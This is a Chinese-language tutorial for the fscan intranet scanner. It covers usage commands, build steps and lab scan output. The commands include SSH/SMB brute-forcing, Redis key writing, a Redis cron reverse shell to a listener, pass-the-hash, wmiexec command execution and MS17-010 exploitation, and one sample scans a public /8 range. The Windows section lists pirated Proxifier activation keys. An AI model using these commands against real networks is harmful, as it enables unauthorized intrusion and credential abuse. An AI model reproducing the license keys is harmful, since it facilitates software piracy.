fscan一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
1.信息搜集:
2.爆破功能:
3.系统信息、漏洞扫描:
4.Web探测功能:
5.漏洞利用:
6.其他功能:
简单用法
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
fscan.exe -h 192.168.1.1/16 (B段扫描)
其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
1、先下载go环境,因为fscan是用go语言编译的。所以系统需要go语言环境;可以直接官网下载(直接百度go官网,然后Download找到Linux版本)或者直接命令下载(根据自己所需的环境下载对应版本)
[root@localhost ~]# wget https://dl.google.com/go/go1.20.1.linux-amd64.tar.gz
#这里下载的是1.20版本,建议下载1.17版本之上的,因为后面有地方要求1.17版本以上
#解压到/usr/local目录下
[root@localhost ~]# tar -C /usr/local/ -zxvf go1.20.1.linux-amd64.tar.gz
#解压成功可以在local文件夹下看到go文件夹
[root@localhost ~]# ls /usr/local/
bin etc games go include lib lib64 libexec sbin share src
[root@localhost ~]#
root@localhost ~]# vi /etc/profile.d/go.sh
export GOROOT=/usr/local/go
export GOPATH=/data/go
export PATH=$PATH:$GOROOT/bin:$GOPATH
export GO111MODULE="on"
export GOPROXY=https://goproxy.cn,direct
root@localhost ~]# source /etc/profile
#查看go环境是否搭建成功
[root@localhost ~]# go version
go version go1.20.1 linux/amd64
[root@localhost ~]#
注意:输入go version
查看是否成功,若没有出现版本号或者出现的是之前版本号,则输入
cp -f $GOROOT/bin/go* /usr/bin/
将其覆盖掉即可,再次输入go version查看即可
下载fscan二进制文件:
#注意由于github是国外网站,所以拉不下来是属于正常现象,可以自己去官网下载
[root@localhost ~]# git clone https://github.com/shadow1ng/fscan.git
Cloning into 'fscan'...
fatal: unable to access 'https://github.com/shadow1ng/fscan.git/': TCP connection reset by peer
[root@localhost ~]#
[root@localhost ~]#
#下载fscan
[root@localhost ~]# git clone https://github.com/shadow1ng/fscan.git
Cloning into 'fscan'...
remote: Enumerating objects: 2289, done.
remote: Counting objects: 100% (315/315), done.
remote: Compressing objects: 100% (114/114), done.
remote: Total 2289 (delta 223), reused 214 (delta 200), pack-reused 1974
Receiving objects: 100% (2289/2289), 13.51 MiB | 959.00 KiB/s, done.
Resolving deltas: 100% (1296/1296), done.
#下载完成后进入fscan目录下打开终端,使用root权限进行编译
[root@localhost ~]# ls
anaconda-ks.cfg fscan go1.20.1.linux-amd64.tar.gz
[root@localhost ~]# cd fscan/
[root@localhost fscan]# ls
common go.mod go.sum image LICENSE.txt main.go Plugins README_EN.md README.md WebScan
[root@localhost fscan]# go build -ldflags="-s -w " -trimpath
go: downloading golang.org/x/net v0.7.0
go: downloading github.com/shadow1ng/goWMIExec v0.0.2
go: downloading github.com/denisenkom/go-mssqldb v0.12.2
go: downloading github.com/go-sql-driver/mysql v1.6.0
go: downloading github.com/hirochachacha/go-smb2 v1.1.0
go: downloading github.com/jlaffaye/ftp v0.0.0-20220829015825-b85cf1edccd4
go: downloading github.com/lib/pq v1.10.6
go: downloading github.com/sijms/go-ora/v2 v2.5.3
go: downloading github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8
go: downloading github.com/shadow1ng/grdp v1.0.3
go: downloading golang.org/x/crypto v0.3.0
go: downloading golang.org/x/text v0.7.0
go: downloading gopkg.in/yaml.v3 v3.0.1
go: downloading github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe
go: downloading github.com/golang-sql/sqlexp v0.1.0
go: downloading go.uber.org/zap v1.14.0
go: downloading github.com/hashicorp/go-multierror v1.1.1
go: downloading github.com/google/cel-go v0.13.0
go: downloading github.com/satori/go.uuid v1.2.0
go: downloading google.golang.org/genproto v0.0.0-20221027153422-115e99e71e1c
go: downloading google.golang.org/protobuf v1.28.1
go: downloading gopkg.in/yaml.v2 v2.4.0
go: downloading github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358
go: downloading github.com/icodeface/tls v0.0.0-20190904083142-17aec93c60e5
go: downloading github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40
go: downloading go.uber.org/atomic v1.5.0
go: downloading go.uber.org/multierr v1.3.0
go: downloading github.com/hashicorp/errwrap v1.0.0
go: downloading github.com/stoewer/go-strcase v1.2.0
go: downloading github.com/geoffgarside/ber v1.1.0
go: downloading golang.org/x/sys v0.5.0
go: downloading github.com/antlr/antlr4/runtime/Go/antlr v1.4.10
[root@localhost fscan]#
1、fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)
[root@localhost fscan]# ./fscan -h 192.168.134.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.134.130 is alive
(icmp) Target 192.168.134.2 is alive
(icmp) Target 192.168.134.1 is alive
(icmp) Target 192.168.134.131 is alive
[*] Icmp alive hosts len is: 4
192.168.134.131:445 open
192.168.134.131:80 open
192.168.134.1:445 open
192.168.134.131:21 open
192.168.134.131:139 open
192.168.134.130:22 open
192.168.134.1:139 open
192.168.134.131:135 open
192.168.134.1:135 open
192.168.134.1:7680 open
[*] alive ports len is: 10
start vulscan
[*] NetInfo:
[*]192.168.134.1
[->]DESKTOP-TR23137
[->]192.168.134.1
[->]192.168.195.1
[->]10.18.3.83
[*] NetBios: 192.168.134.131 WORKGROUP\WIN-A1G22OHGPC0 Windows Server 2012 R2 Standard 9600
[*] WebTitle: http://192.168.134.131 code:200 len:701 title:IIS Windows Server
[+] SSH:192.168.134.130:22:root 1
已完成 10/10
[*] 扫描结束,耗时: 27.61812334s
[root@localhost fscan]#
2、fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)
[root@localhost fscan]# ./fscan -h 192.168.134.130 -rf id_rsa.pub
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.134.130 is alive
[*] Icmp alive hosts len is: 1
192.168.134.130:22 open
[*] alive ports len is: 1
start vulscan
[+] SSH:192.168.134.130:22:root 1
已完成 1/1
[*] 扫描结束,耗时: 25.182541568s
[root@localhost fscan]#
3、fscan.exe -h 192.168.x.x -c “whoami;id” (ssh 命令)
[root@localhost fscan]# ./fscan -h 192.168.134.130 -c "whoami;id"
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.134.130 is alive
[*] Icmp alive hosts len is: 1
192.168.134.130:22 open
[*] alive ports len is: 1
start vulscan
[+] SSH:192.168.134.130:22:root 1
root
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
已完成 1/1
[*] 扫描结束,耗时: 23.193620374s
[root@localhost fscan]#
4、go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)
(icmp) Target 192.253.247.67 is alive
(icmp) Target 192.163.164.5 is alive
(icmp) Target 192.229.126.5 is alive
(icmp) Target 192.234.93.254 is alive
(icmp) Target 192.234.237.5 is alive
[*] LiveTop 192.0.0.0/16 段存活数量为: 597
[*] LiveTop 192.3.0.0/16 段存活数量为: 399
[*] LiveTop 192.63.0.0/16 段存活数量为: 122
[*] LiveTop 192.24.0.0/16 段存活数量为: 99
[*] LiveTop 192.185.0.0/16 段存活数量为: 93
[*] LiveTop 192.228.0.0/16 段存活数量为: 86
[*] LiveTop 192.181.0.0/16 段存活数量为: 80
[*] LiveTop 192.142.0.0/16 段存活数量为: 61
[*] LiveTop 192.226.0.0/16 段存活数量为: 54
[*] LiveTop 192.180.0.0/16 段存活数量为: 54
[*] LiveTop 192.0.76.0/24 段存活数量为: 10
[*] LiveTop 192.0.66.0/24 段存活数量为: 10
[*] LiveTop 192.0.79.0/24 段存活数量为: 10
[*] LiveTop 192.0.78.0/24 段存活数量为: 10
[*] LiveTop 192.0.72.0/24 段存活数量为: 10
[*] LiveTop 192.0.63.0/24 段存活数量为: 10
[*] LiveTop 192.0.54.0/24 段存活数量为: 10
[*] LiveTop 192.0.77.0/24 段存活数量为: 10
[*] LiveTop 192.0.65.0/24 段存活数量为: 10
[*] LiveTop 192.0.73.0/24 段存活数量为: 10
[*] Icmp alive hosts len is: 3800
[*] 扫描结束,耗时: 23.913910306s
[root@localhost fscan]#
首先,因为fscan是用go语言编译的。所以系统是需要go语言环境
go 环境的安装配置在windows上了可以选择用msi文件安装。下面附上下载链接:https://go.dev/dl/
直接双击点,然后默认继续就可以,不用更改什么东西,你可以选择自定义安装目录。不过默认的是在C:/Program file/Go
,而且使用msi安装方式是不用自己配置环境变量,他自动就配置完了。
go version
在GitHub上下载fscan,源码链接:https://github.com/shadow1ng/fscan
解压整个包即可,大家会发现解压后在项目中并没有fscan.exe文件,因为这个exe文件时需要编译生成的,并不是自带的。
在编译生成fscan.exe可执行文件之前,还有几个步骤需要执行。
下载链接: https://www.proxifier.com/download/
这里安装完成后的proxfier是一个试用版,需要激活密钥,这里给大家直接提供,根据环境自行选择
proxfier的激活秘钥是:
And his activation key is:
L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C(Portable Edition)#免安装版本
L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C (便携版) # 免安装版本
5EZ8G-C3WL5-B56YG-SCXM9-6QZAP(Standard Edition)#安装版本
5EZ8G-C3WL5-B56YG-SCXM9-6QZAP (标准版) # 安装版本
P427L-9Y552-5433E-8DSR3-58Z68(MAC) #mac版本 ;
P427L-9Y552-5433E-8DSR3-58Z68(MAC) # MAC 版本;
初次安装,生成fscan.exe文件报错。运行 **go build
**命令时,因为权限不足无法在指定的路径下创建可执行文件。原因是系统不知道编译好的exe文件应该放在哪里,因此放在临时文件夹里,但临时文件(%temp%)没有足够的读写权限。即使在设置中给了权限仍提示拒绝访问。
解决方案
设置输出编译好的exe文件存放路径,指明要编译哪个go文件
注意
:请不要将输出路径设置为系统目录或其他重要目录,否则可能会对系统或其他程序造成损害。
执行成功,查看文件中有没有生成对应的exe文件
fscan执行成功,可以愉快地进行漏扫了。